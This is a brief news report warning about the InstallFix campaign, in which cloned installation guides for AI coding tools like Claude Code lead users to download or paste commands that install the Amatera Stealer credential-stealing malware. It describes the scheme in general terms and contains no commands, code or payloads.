Malware Hides in AI Coding Guides

A sophisticated malware scheme known as InstallFix is actively targeting aspiring coders, particularly those experimenting with AI tools like Claude Code. These attackers create deceptive websites that mimic genuine installation guides, strategically appearing in search engine results. The scam exploits user trust by embedding malicious links within these fake guides. Users initiating the installation process are vulnerable because the attack often involves pasting commands into their terminal, initiated from a source they believe to be trustworthy. These cloned sites meticulously replicate legitimate platforms, including logos and layout, making them difficult to distinguish. However, download links on these fake sites direct to attacker-controlled servers, enabling the distribution of malware that often evades standard anti-malware software. The initial executable downloaded by the user then fetches additional malicious payloads from remote URLs. Evidence suggests this malware is linked to the Amatera Stealer, focusing on exfiltrating user credentials, cookies, and session tokens, and proves challenging to eradicate. While this specific campaign focuses on Claude Code, the InstallFix technique is expected to spread as AI tools gain popularity, drawing in novice users.